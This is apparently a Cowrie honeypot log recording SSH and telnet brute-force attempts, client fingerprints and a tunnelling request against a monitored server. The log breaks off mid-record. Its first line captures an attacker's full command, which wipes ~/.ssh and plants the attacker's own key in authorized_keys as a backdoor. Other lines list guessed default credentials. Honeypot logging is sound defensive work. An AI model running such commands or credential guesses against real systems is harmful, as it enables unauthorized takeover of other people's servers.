{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:13:37.042975Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:13:37.602051Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:37.602940Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36828,"dst_ip":"1.2.3.4","dst_port":22,"session":"971ae909d878","protocol":"ssh","message":"New connection: 212.227.235.229:36828 (1.2.3.4:22) [session: 971ae909d878]","sensor":"my-vps","timestamp":"2025-09-08T23:13:37.923224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:37.924117Z","src_ip":"212.227.235.229","session":"971ae909d878"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:38.237388Z","src_ip":"212.227.235.229","session":"971ae909d878"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:39.544871Z","src_ip":"212.227.235.229","session":"971ae909d878"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:40.860992Z","src_ip":"212.227.235.229","session":"971ae909d878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36836,"dst_ip":"1.2.3.4","dst_port":22,"session":"de57e14c0fe4","protocol":"ssh","message":"New connection: 212.227.235.229:36836 (1.2.3.4:22) [session: de57e14c0fe4]","sensor":"my-vps","timestamp":"2025-09-08T23:13:41.182114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:41.183135Z","src_ip":"212.227.235.229","session":"de57e14c0fe4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:41.504805Z","src_ip":"212.227.235.229","session":"de57e14c0fe4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:13:42.841539Z","src_ip":"212.227.235.229","session":"de57e14c0fe4"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:43.160856Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:43.165276Z","src_ip":"212.227.235.229","session":"de57e14c0fe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51674,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5e04777462d","protocol":"ssh","message":"New connection: 212.227.235.229:51674 (1.2.3.4:22) [session: b5e04777462d]","sensor":"my-vps","timestamp":"2025-09-08T23:13:49.158074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:49.158970Z","src_ip":"212.227.235.229","session":"b5e04777462d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:49.409564Z","src_ip":"212.227.235.229","session":"b5e04777462d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":14495,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbc50ce047b2","protocol":"ssh","message":"New connection: 212.227.125.160:14495 (1.2.3.4:22) [session: cbc50ce047b2]","sensor":"my-vps","timestamp":"2025-09-08T23:13:50.077792Z"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:50.453856Z","src_ip":"212.227.235.229","session":"b5e04777462d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.9","message":"Remote SSH version: SSH-2.0-OpenSSH_9.9","sensor":"my-vps","timestamp":"2025-09-08T23:13:50.565198Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.client.kex","hassh":"1cc79c7da9b5d5eead2c60983332a556","hasshAlgorithms":"sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["sntrup761x25519-sha512","sntrup761x25519-sha512@openssh.com","mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1cc79c7da9b5d5eead2c60983332a556","sensor":"my-vps","timestamp":"2025-09-08T23:13:50.658326Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:51.706693Z","src_ip":"212.227.235.229","session":"b5e04777462d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57006,"dst_ip":"1.2.3.4","dst_port":22,"session":"31fafd1e9a24","protocol":"ssh","message":"New connection: 212.227.235.229:57006 (1.2.3.4:22) [session: 31fafd1e9a24]","sensor":"my-vps","timestamp":"2025-09-08T23:13:51.805557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:51.806379Z","src_ip":"212.227.235.229","session":"31fafd1e9a24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:52.117342Z","src_ip":"212.227.235.229","session":"31fafd1e9a24"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-09-08T23:13:52.378018Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:52.380110Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:13:52.899846Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:53.402507Z","src_ip":"212.227.235.229","session":"31fafd1e9a24"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:54.715931Z","src_ip":"212.227.235.229","session":"31fafd1e9a24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46910,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfe52e41e00a","protocol":"ssh","message":"New connection: 212.227.235.229:46910 (1.2.3.4:22) [session: cfe52e41e00a]","sensor":"my-vps","timestamp":"2025-09-08T23:13:56.729917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:56.730651Z","src_ip":"212.227.235.229","session":"cfe52e41e00a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:56.865859Z","src_ip":"212.227.235.229","session":"cfe52e41e00a"}
{"eventid":"cowrie.login.failed","username":"openhabian","password":"openhabian","message":"login attempt [openhabian/openhabian] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:57.446985Z","src_ip":"212.227.235.229","session":"cfe52e41e00a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:58.582168Z","src_ip":"212.227.235.229","session":"cfe52e41e00a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34746,"dst_ip":"1.2.3.4","dst_port":23,"session":"546d5de3f231","protocol":"telnet","message":"New connection: 212.227.235.229:34746 (1.2.3.4:23) [session: 546d5de3f231]","sensor":"my-vps","timestamp":"2025-09-08T23:14:06.039653Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:14:06.237435Z","src_ip":"212.227.235.229","session":"546d5de3f231"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:14:06.267092Z","src_ip":"212.227.235.229","session":"546d5de3f231"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":443,"src_ip":"212.227.125.160","src_port":49426,"message":"direct-tcp connection request to google.com:443 from 127.0.0.1:49426","sensor":"my-vps","timestamp":"2025-09-08T23:14:10.966442Z","session":"cbc50ce047b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87\\x9c\\xc67\\xa3\\xea\\xe0-\\x01|%\\xc1\\x13\\xe3\\x8a(\\xa7\\n\\xecp\\xe8\\x98<\\x8d\\x17\\xe91A\\x04\\xec@6 8\\xa8\\xa4\\x9d\\xe0\\xd4\\xceh\\xa0o\\xe9e_\\xe7a\\x15\\x10\\xc1Z\\x9f\\x9a\\xe7\\x13\\x06\\xdb\\xda#\"\\xce\\xd3\\x91E\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0\\'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8o\\x88\\x89\\x1auZ\\xbc\\x84\\x17\\xe8\\xf1\\xa4\\xf6%\\x8a\\xe3\\x89a\\x9a\\xe1\\xfd|-\\x91\\xaa\\xd24\\x07\\xca\\xec]\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to google.com:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87\\x9c\\xc67\\xa3\\xea\\xe0-\\x01|%\\xc1\\x13\\xe3\\x8a(\\xa7\\n\\xecp\\xe8\\x98<\\x8d\\x17\\xe91A\\x04\\xec@6 8\\xa8\\xa4\\x9d\\xe0\\xd4\\xceh\\xa0o\\xe9e_\\xe7a\\x15\\x10\\xc1Z\\x9f\\x9a\\xe7\\x13\\x06\\xdb\\xda#\"\\xce\\xd3\\x91E\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0\\'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x